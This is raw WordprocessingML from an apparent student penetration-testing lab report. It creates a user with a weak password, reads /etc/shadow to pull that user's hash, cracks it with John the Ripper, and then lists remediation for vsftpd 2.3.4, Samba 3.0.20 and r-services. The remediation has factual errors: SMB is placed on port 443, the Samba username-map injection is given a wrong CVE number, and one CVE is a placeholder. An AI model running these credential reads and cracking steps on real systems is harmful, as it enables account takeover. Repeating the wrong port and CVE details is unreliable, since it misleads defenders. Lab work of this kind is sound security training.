            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="6609630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63077" name="Picture 6609630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895CC4" w14:textId="77777777" w:rsidR="0059334C" w:rsidRDefault="0059334C" w:rsidP="00CD51DF"/>
    <w:p w14:paraId="78888F4A" w14:textId="77777777" w:rsidR="00261CB0" w:rsidRPr="00C50E4F" w:rsidRDefault="00261CB0" w:rsidP="00261CB0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C50E4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 5 - Create user with root permission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EE157A" w14:textId="77777777" w:rsidR="00261CB0" w:rsidRDefault="00261CB0" w:rsidP="00261CB0">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>adduser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>your_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6D687565" w14:textId="2FECF24F" w:rsidR="00261CB0" w:rsidRDefault="00261CB0" w:rsidP="00261CB0">
      <w:r>
        <w:t>Set a simple password example 12345 or hello or 987654321</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6CA6BD" w14:textId="77777777" w:rsidR="00261CB0" w:rsidRDefault="00261CB0" w:rsidP="00261CB0">
      <w:r>
        <w:t>Get the details of user in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39F0B98A" w14:textId="293675C7" w:rsidR="0059334C" w:rsidRDefault="00261CB0" w:rsidP="00CD51DF">
      <w:r>
        <w:t xml:space="preserve">Enter details of the new user you have added in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230E39D6" w14:textId="31DF6CDF" w:rsidR="00203498" w:rsidRDefault="00203498" w:rsidP="00332EDF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>adduser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AC5044">
        <w:t>minakshi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AC5044">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CD99C3" w14:textId="2E33075E" w:rsidR="00203498" w:rsidRDefault="00203498" w:rsidP="00332EDF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>password hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3190B192" w14:textId="6D66470C" w:rsidR="00203498" w:rsidRDefault="00203498" w:rsidP="00332EDF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 w:rsidR="00332EDF">
        <w:t>minakshi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00332EDF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F8FEE4" w14:textId="48633612" w:rsidR="00203498" w:rsidRDefault="00203498" w:rsidP="00CA618A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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 w:rsidR="00CA618A">
        <w:t>minakshi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CA618A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695723ED" w14:textId="3A9AB4B9" w:rsidR="00203498" w:rsidRDefault="00C56CCE" w:rsidP="00BD7FA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>minakshi</w:t>
      </w:r>
      <w:r w:rsidR="00203498">
        <w:t>:x:1002:1002:,,,:/home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00636D55">
        <w:t>minakshi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00203498">
        <w:t>:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E13D56" w14:textId="77777777" w:rsidR="00E23B79" w:rsidRDefault="00203498" w:rsidP="00E23B79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cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/shadow | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>grep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00636D55">
        <w:t>minakshi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6CE93EA4" w14:textId="5199E8F7" w:rsidR="00DD6A39" w:rsidRDefault="00E23B79" w:rsidP="00CD51DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>minakshi</w:t>
      </w:r>
      <w:r w:rsidR="00203498">
        <w:t>:$y$j9T$ep3Qv2Hy8a5uO71kK7yOm0$rxMKpQlW2n/XflTYSpcCljAKbKROVgZHXHr50E5ed.4:20223:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371CC895" w14:textId="77777777" w:rsidR="00AD2AD7" w:rsidRDefault="00AD2AD7" w:rsidP="00AD2AD7"/>
    <w:p w14:paraId="7ED9472C" w14:textId="67281D51" w:rsidR="00AD2AD7" w:rsidRPr="003C245E" w:rsidRDefault="00AD2AD7" w:rsidP="00AD2AD7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C245E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 6 – Cracking password hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708C52B3" w14:textId="77777777" w:rsidR="00AD2AD7" w:rsidRDefault="00AD2AD7" w:rsidP="00AD2AD7"/>
    <w:p w14:paraId="05F04C51" w14:textId="77777777" w:rsidR="00FD6622" w:rsidRDefault="00AD2AD7" w:rsidP="003C245E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nano</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003621B6">
        <w:t>minakshi</w:t>
      </w:r>
      <w:r>
        <w:t>_hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6744F9EA" w14:textId="4267188B" w:rsidR="003C245E" w:rsidRDefault="00601030" w:rsidP="00EC2D34">
      <w:pPr>
        <w:pStyle w:val="ListParagrap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0D73430" wp14:editId="26AA17AB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>114300</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>118745</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="483235"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1730292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9208" name="Picture 1730292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33DCD" w14:textId="3331E352" w:rsidR="00AD2AD7" w:rsidRDefault="00AD2AD7" w:rsidP="00AD2AD7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">/john </w:t>
      </w:r>
      <w:r w:rsidR="003621B6">
        <w:t>minakshi</w:t>
      </w:r>
      <w:r>
        <w:t>_hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283BBDC3" w14:textId="290CA8F4" w:rsidR="00021B62" w:rsidRDefault="00021B62" w:rsidP="00021B62">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="280633B3" wp14:editId="0DB6FAEA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>61595</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>55245</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4192905" cy="1099820"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="16279452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45210" name="Picture 16279452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4A840" w14:textId="674309C7" w:rsidR="001345D1" w:rsidRDefault="00AD2AD7" w:rsidP="001345D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">/john </w:t>
      </w:r>
      <w:r w:rsidR="003621B6">
        <w:t>minakshi</w:t>
      </w:r>
      <w:r>
        <w:t>_hash.txt –show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B41B03B" w14:textId="5E287E79" w:rsidR="00AD2AD7" w:rsidRDefault="001345D1" w:rsidP="00AD2AD7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4972374F" wp14:editId="67175765">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>492125</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>111760</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2145030" cy="781685"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="10324945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94516" name="Picture 10324945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28852" w14:textId="77777777" w:rsidR="00AD2AD7" w:rsidRDefault="00AD2AD7" w:rsidP="00AD2AD7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC2D34">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 7 – Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A77AEA" w14:textId="77777777" w:rsidR="00206FDC" w:rsidRDefault="00206FDC" w:rsidP="00AD2AD7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77F7C72E" w14:textId="77777777" w:rsidR="005C25A0" w:rsidRPr="005C25A0" w:rsidRDefault="005C25A0" w:rsidP="005C25A0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C25A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. FTP Service (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C25A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C25A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCF4CFC" w14:textId="336F7B18" w:rsidR="00FB1005" w:rsidRPr="00345E2C" w:rsidRDefault="005C25A0" w:rsidP="00FB1005">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00345E2C">
        <w:t xml:space="preserve">Current Version: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00345E2C">
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00345E2C">
        <w:t xml:space="preserve"> 2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F79739C" w14:textId="77777777" w:rsidR="00D94CBD" w:rsidRPr="00345E2C" w:rsidRDefault="005C25A0" w:rsidP="005C25A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00345E2C">
        <w:t xml:space="preserve">Latest Version: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00345E2C">
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00345E2C">
        <w:t xml:space="preserve"> 3.0.5 (2025)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3269D83B" w14:textId="77777777" w:rsidR="00592111" w:rsidRPr="00345E2C" w:rsidRDefault="005C25A0" w:rsidP="005C25A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00345E2C">
        <w:t>Vulnerability:</w:t>
      </w:r>
      <w:r w:rsidR="00592111" w:rsidRPr="00345E2C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF8B701" w14:textId="77777777" w:rsidR="006F2E43" w:rsidRPr="00345E2C" w:rsidRDefault="005C25A0" w:rsidP="005C25A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00345E2C">
        <w:t>Backdoor in 2.3.4 allows root shell access via crafted payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0766F12B" w14:textId="3BBA8EB6" w:rsidR="00EE2A93" w:rsidRPr="00345E2C" w:rsidRDefault="005C25A0" w:rsidP="00EE2A93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00345E2C">
        <w:t>CVE: CVE-2011-2523</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6994463D" w14:textId="62C05417" w:rsidR="005C25A0" w:rsidRPr="00345E2C" w:rsidRDefault="005C25A0" w:rsidP="00411DB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00345E2C">
        <w:t>Impact: Full system compromise by unauthenticated attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2622E111" w14:textId="48C0CB66" w:rsidR="005C25A0" w:rsidRPr="00345E2C" w:rsidRDefault="005C25A0" w:rsidP="00B77F16">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00345E2C">
        <w:t>Remediation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A28618" w14:textId="77777777" w:rsidR="00CC14AA" w:rsidRPr="00345E2C" w:rsidRDefault="005C25A0" w:rsidP="005C25A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00345E2C">
        <w:t xml:space="preserve">Upgrade to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00345E2C">
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00345E2C">
        <w:t xml:space="preserve"> 3.0.5 (fully patched)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5070E6" w14:textId="5A895FD7" w:rsidR="005C25A0" w:rsidRPr="00345E2C" w:rsidRDefault="005C25A0" w:rsidP="005C25A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00345E2C">
        <w:t xml:space="preserve"> Or disable FTP entirely and switch to SFTP (via SSH</w:t>
      </w:r>
      <w:r w:rsidR="00FF2820" w:rsidRPr="00345E2C">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56079A39" w14:textId="596981FA" w:rsidR="006A17C3" w:rsidRPr="006A17C3" w:rsidRDefault="005C25A0" w:rsidP="006A17C3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C25A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Samba SMB (Port 443)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0331CB22" w14:textId="77777777" w:rsidR="00193FD4" w:rsidRPr="007F7916" w:rsidRDefault="005C25A0" w:rsidP="005C25A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7916">
        <w:t>Current Version: Samba 3.0.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52178FA7" w14:textId="77777777" w:rsidR="00B71884" w:rsidRPr="007F7916" w:rsidRDefault="005C25A0" w:rsidP="005C25A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7916">
        <w:t>Latest Version: Samba 4.20.1 (May 2025)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2814B0F4" w14:textId="77777777" w:rsidR="00435146" w:rsidRPr="007F7916" w:rsidRDefault="005C25A0" w:rsidP="005C25A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7916">
        <w:t>Vulnerabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA6CCD9" w14:textId="77777777" w:rsidR="00E13113" w:rsidRPr="007F7916" w:rsidRDefault="005C25A0" w:rsidP="005C25A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7916">
        <w:t>Remote Code Execution (RCE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565270F9" w14:textId="77777777" w:rsidR="00E13113" w:rsidRPr="007F7916" w:rsidRDefault="005C25A0" w:rsidP="005C25A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7916">
        <w:t>Session hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FCA8CA" w14:textId="77777777" w:rsidR="00E13113" w:rsidRPr="007F7916" w:rsidRDefault="005C25A0" w:rsidP="005C25A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7916">
        <w:t>Arbitrary file read/write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2897F0EF" w14:textId="77777777" w:rsidR="00E13113" w:rsidRPr="007F7916" w:rsidRDefault="005C25A0" w:rsidP="005C25A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7916">
        <w:t>CVE-2007-2442: Command injection via username map script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64908991" w14:textId="78712B52" w:rsidR="005C25A0" w:rsidRPr="007F7916" w:rsidRDefault="005C25A0" w:rsidP="005C25A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7916">
        <w:t>CVE-2017-XXXX: Arbitrary code execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FA6236" w14:textId="77777777" w:rsidR="005C25A0" w:rsidRPr="007F7916" w:rsidRDefault="005C25A0" w:rsidP="005C25A0"/>
    <w:p w14:paraId="52DF44D5" w14:textId="371BA31B" w:rsidR="005C25A0" w:rsidRPr="007F7916" w:rsidRDefault="005C25A0" w:rsidP="005C25A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7916">
        <w:t>Impact: Attackers can gain shell access, move laterally, and steal credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575A37C8" w14:textId="77777777" w:rsidR="0081365F" w:rsidRPr="007F7916" w:rsidRDefault="005C25A0" w:rsidP="005C25A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7916">
        <w:t>Remediation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEA7026" w14:textId="77777777" w:rsidR="00435146" w:rsidRPr="007F7916" w:rsidRDefault="005C25A0" w:rsidP="005C25A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7916">
        <w:t>Upgrade to Samba 4.20.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E50D33" w14:textId="77777777" w:rsidR="00435146" w:rsidRPr="007F7916" w:rsidRDefault="005C25A0" w:rsidP="005C25A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7916">
        <w:t>Disable SMBv1, restrict to trusted IPs only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282E548B" w14:textId="77777777" w:rsidR="00435146" w:rsidRPr="007F7916" w:rsidRDefault="005C25A0" w:rsidP="005C25A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7916">
        <w:t xml:space="preserve"> Harden /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F7916">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F7916">
        <w:t>/samba/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F7916">
        <w:t>smb.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F7916">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EA8097" w14:textId="77777777" w:rsidR="00435146" w:rsidRPr="007F7916" w:rsidRDefault="005C25A0" w:rsidP="005C25A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7916">
        <w:t>Disable guest access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50957C07" w14:textId="5500B347" w:rsidR="005C25A0" w:rsidRPr="007F7916" w:rsidRDefault="005C25A0" w:rsidP="005C25A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7916">
        <w:t>Enable detailed loggi</w:t>
      </w:r>
      <w:r w:rsidR="002B195D" w:rsidRPr="007F7916">
        <w:t xml:space="preserve">ng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C4026B" w14:textId="77777777" w:rsidR="005C25A0" w:rsidRPr="007F7916" w:rsidRDefault="005C25A0" w:rsidP="005C25A0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7916">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. R Services (Ports 512–514)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CD1C28" w14:textId="77777777" w:rsidR="002B195D" w:rsidRPr="007F7916" w:rsidRDefault="005C25A0" w:rsidP="005C25A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7916">
        <w:t xml:space="preserve">Services Affected: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F7916">
        <w:t>rexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F7916">
        <w:t xml:space="preserve">, rlogin, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F7916">
        <w:t>rsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F7916">
        <w:t xml:space="preserve"> (legacy UNIX services)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729ACF55" w14:textId="77777777" w:rsidR="00E24B2E" w:rsidRPr="007F7916" w:rsidRDefault="005C25A0" w:rsidP="005C25A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7916">
        <w:t>Status: Obsolete, insecure, and deprecated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0527F4E0" w14:textId="06CFEA32" w:rsidR="005C25A0" w:rsidRPr="007F7916" w:rsidRDefault="005C25A0" w:rsidP="005C25A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7916">
        <w:t>Vulnerabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE0F5DB" w14:textId="77777777" w:rsidR="008744A2" w:rsidRPr="007F7916" w:rsidRDefault="005C25A0" w:rsidP="008744A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7916">
        <w:t>Sends plaintext credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A5E257" w14:textId="77777777" w:rsidR="008744A2" w:rsidRPr="007F7916" w:rsidRDefault="005C25A0" w:rsidP="008744A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
